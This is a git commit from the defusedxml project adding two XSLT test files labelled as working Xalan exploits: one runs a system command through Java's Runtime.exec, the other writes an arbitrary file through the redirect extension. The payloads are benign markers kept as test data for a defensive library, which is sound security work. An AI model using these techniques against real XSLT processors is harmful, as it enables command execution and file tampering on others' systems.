summaryrefslogtreecommitdiff
path: root/xmltestdata
diff options
context:
space:
mode:
authorChristian Heimes <christian@python.org>2013-03-07 22:03:36 +0100
committerChristian Heimes <christian@python.org>2013-03-07 22:03:36 +0100
commit4ad1716a750cda8c78a9e06a21e870cb26f2f4c9 (patch)
tree48e6fc95b61ef2feaed897abcd25826fb0d7e33e /xmltestdata
parente58f866ad29fb4d95d21e0e8b04f775ca25a1f7a (diff)
downloaddefusedxml-git-4ad1716a750cda8c78a9e06a21e870cb26f2f4c9.tar.gz
add two working xalan exploits
Diffstat (limited to 'xmltestdata')
-rw-r--r--xmltestdata/xalan_exec.xsl20
-rw-r--r--xmltestdata/xalan_write.xsl18
2 files changed, 38 insertions, 0 deletions
diff --git a/xmltestdata/xalan_exec.xsl b/xmltestdata/xalan_exec.xsl
new file mode 100644
index 0000000..b06c59a
--- /dev/null
+++ b/xmltestdata/xalan_exec.xsl
@@ -0,0 +1,20 @@
+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+ OpenJDK 1.7.0_15
+
+ $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+ org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_exec.xsl
+-->
+<xsl:stylesheet version="1.0"
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+ xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
+ xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+ exclude-result-prefixes="rt ob">
+ <xsl:template match="/">
+ <xsl:variable name="runtimeObject" select="rt:getRuntime()"/>
+ <xsl:variable name="command"
+ select="rt:exec($runtimeObject, &apos;/usr/bin/notify-send SomethingBadHappensHere&apos;)"/>
+ <xsl:variable name="commandAsString" select="ob:toString($command)"/>
+ <xsl:value-of select="$commandAsString"/>
+ </xsl:template>
+</xsl:stylesheet>
+
diff --git a/xmltestdata/xalan_write.xsl b/xmltestdata/xalan_write.xsl
new file mode 100644
index 0000000..56d35b9
--- /dev/null
+++ b/xmltestdata/xalan_write.xsl
@@ -0,0 +1,18 @@
+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+ OpenJDK 1.7.0_15
+
+ $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+ org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_write.xsl
+-->
+<xsl:stylesheet version="1.0"
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+ xmlns:redirect="http://xml.apache.org/xalan/redirect"
+ extension-element-prefixes="redirect">
+ <xsl:output omit-xml-declaration="yes" indent="yes"/>
+ <xsl:template match="/">
+ <redirect:write file="xalan_redirect.txt" method="text">
+ <xsl:text>Something bad happens here!&#13;</xsl:text>
+ </redirect:write>
+ </xsl:template>
+</xsl:stylesheet>
+
View Lorry Controller Status